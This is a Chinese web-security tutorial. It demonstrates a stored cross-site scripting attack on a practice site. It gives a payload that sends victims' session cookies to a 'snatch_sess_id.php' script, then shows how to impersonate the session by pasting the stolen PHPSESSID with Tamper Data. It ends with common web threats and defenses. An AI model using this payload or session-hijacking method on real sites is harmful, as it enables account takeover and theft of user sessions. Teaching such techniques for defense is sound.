如何入侵网站？常见的网站入侵技术

网站黑客技术

越来越多的人可以访问互联网。这促使许多组织开发基于 Web 的应用程序，用户可以使用这些应用程序在线与组织进行交互。编写不当的 Web 应用程序代码可能会被利用来未经授权访问敏感数据和 Web 服务器。

在本教程中，您将学习如何破解网站，我们将向您介绍 Web 应用程序黑客攻击技术及应对措施 您可以采取措施来防范此类攻击。

如何破解网站

在此网站黑客攻击实际场景中，我们将劫持位于以下位置的 Web 应用程序的用户会话： www.techpanda.org。我们将使用跨站点脚本来读取 cookie 会话 ID，然后使用它来模拟合法用户会话。

假设攻击者可以访问 Web 应用程序，并且他想劫持使用同一应用程序的其他用户的会话。假设攻击者的访问帐户是受限的，则此攻击的目标可能是获得 Web 应用程序的管理员访问权限。

步骤1） 开启网址 http://www.techpanda.org/.

出于练习目的，强烈建议使用 SQL 注入来获取访问权限。请参阅此 刊文 以获取有关如何执行此操作的更多信息。

步骤2） 输入登录详细信息。

登录邮箱是 admin@google.com，密码为Password2010。

步骤3） 检查仪表板。

如果你已成功登录，则你将获得以下仪表板

步骤4） 输入新内容。

单击“添加新联系人”，然后输入以下名字

<a href=# onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(document.cookie\)\;\">Dark</a>

步骤5） 添加 Javascript.

上述代码使用 Java脚本. 它添加带有 onclick 事件的超链接。当毫无戒心的用户点击链接时，事件会检索 PHP cookie 会话 ID，并将其发送到 snatch_sess_id.php 页面以及 URL 中的会话 ID

步骤6） 添加详细信息。

输入如下所示的其余详细信息，然后单击“保存更改”

步骤7） 检查仪表板。

您的仪表板现在将如下所示

步骤8） 检查会话 ID。

由于跨站点脚本代码存储在数据库中，因此每次具有访问权限的用户登录时都会加载该代码

假设管理员登录并点击“暗黑”超链接

他/她将获得 URL 中显示会话 ID 的窗口

备注：脚本可以将值发送到存储 PHPSESSID 的某个远程服务器，然后用户重定向回网站，就像什么都没发生一样。

备注：您获取的值可能与此网页中的值不同 黑客教程，但概念是一样的

会话模拟使用 Firefox 和篡改数据附加组件

下面的流程图显示了完成此练习必须采取的步骤。

• 您将需要 Firefox 本节的网络浏览器和 Tamper Data 插件
• 可选 Firefox 并按照下图所示安装添加

• 搜索篡改数据，然后单击安装，如上图所示

• 单击“接受并安装”...

• 安装完成后单击立即重启
• 启用菜单栏 Firefox 如果没有显示

• 单击工具菜单，然后选择篡改数据，如下所示

• 您将看到以下窗口。注意：如果 Windows 不为空，请点击清除按钮

• 点击开始篡改菜单
• 切换回 Firefox 网络浏览器，输入 http://www.techpanda.org/dashboard.php 然后按回车键加载页面
• 您将从 Tamper Data 中看到以下弹出窗口

• 弹出窗口有三个 (3) 个选项。 Tamper 选项允许你在将 HTTP 标头信息提交给服务器之前对其进行修改.
• 点击它
• 您将看到以下窗口

• 复制 PHP 会话 ID 从攻击 URL 复制并粘贴到等号后面。您的值现在应如下所示

PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2

• 点击“确定”按钮
• 您将再次看到篡改数据弹出窗口

• 取消选中询问是否继续篡改？的复选框。
• 完成后点击提交按钮
• 您应该能够看到如下所示的仪表板

备注：我们并没有登录，而是使用通过跨站点脚本检索到的 PHPSESSID 值模拟了登录会话

什么是 Web 应用程序？什么是 Web 威胁？

Web 应用程序（又称网站）是基于客户端-服务器模型的应用程序。 服务器 提供数据库访问和业务逻辑。它托管在 Web 服务器上。客户端应用程序在客户端 Web 浏览器上运行。Web 应用程序通常使用以下语言编写： Java、C#、VB.Net、PHP、ColdFusion 标记语言等。Web 应用程序中使用的数据库引擎包括 MySQL、MS SQL 服务器、 PostgreSQL, SQLite等等。

顶级网站黑客技术

大多数 Web 应用程序都托管在可通过互联网访问的公共服务器上。由于易于访问，因此它们很容易受到攻击。以下是常见的 Web 应用程序威胁。

• SQL注入 – 此威胁的目标可能是绕过登录算法、破坏数据等。
• 拒绝服务攻击– 此威胁的目标可能是拒绝合法用户访问资源
• 跨站点脚本 XSS– 此威胁的目标可能是注入可在客户端浏览器上执行的代码。
• Cookie/会话中毒– 此威胁的目标是通过攻击者修改 cookie/会话数据来获取未经授权的访问。
• 表单篡改 – 该威胁的目标是修改电子商务应用程序中的价格等表单数据，以便攻击者可以以折扣价获得商品。
• 代码注入 – 此威胁的目标是注入 PHP 等代码， Python等可以在服务器上执行的代码。这些代码可以安装后门、泄露敏感信息等。
• 污损– 该威胁的目标是修改网站上显示的页面，并将所有页面请求重定向到包含攻击者消息的单个页面。

如何保护您的网站免遭黑客攻击？

组织可以采用以下策略来保护自己免受 Web 服务器攻击。

• SQL注入 – 在将用户参数提交到数据库进行处理之前对其进行清理和验证，有助于降低通过以下方式攻击的可能性： SQL注入. 数据库引擎，例如 MS SQL Server， MySQL等支持参数和预处理语句，比传统的 SQL 语句安全很多
• 拒绝服务攻击 – 如果攻击是简单的 DoS，则可以使用防火墙来拦截来自可疑 IP 地址的流量。正确配置网络和入侵检测系统也可以帮助降低发生 DoS攻击 已经成功。
• 跨站脚本 - 验证和清理标头、通过 URL 传递的参数、表单参数和隐藏值有助于减少 XSS 攻击。
• Cookie/会话中毒 – 可以通过加密 cookie 的内容、在一段时间后使 cookie 超时、将 cookie 与用于创建它们的客户端 IP 地址关联来防止这种情况。
• 成型回火 – 可以通过在处理用户输入之前对其进行验证和确认来防止这种情况。
• 代码注入 – 可以通过将所有参数视为数据而不是可执行代码来防止这种情况。可以使用清理和验证来实现这一点。
• 毁损 – 良好的 Web 应用程序开发安全策略应确保其密封 访问 Web 服务器的常用漏洞。这可以是操作系统、Web 服务器软件的正确配置，以及开发 Web 应用程序时的最佳安全实践。

检查： 9 款最佳 URL 扫描程序，检查链接是否免受恶意软件侵害

结语

• Web 应用程序基于服务器-客户端模型。客户端使用 Web 浏览器访问服务器上的资源。
• Web 应用程序通常可通过互联网访问。这使它们容易受到攻击。
• Web 应用程序威胁包括 SQL 注入、代码注入、XSS、污损、Cookie 中毒等。
• 开发 Web 应用程序时，良好的安全策略有助于确保其安全。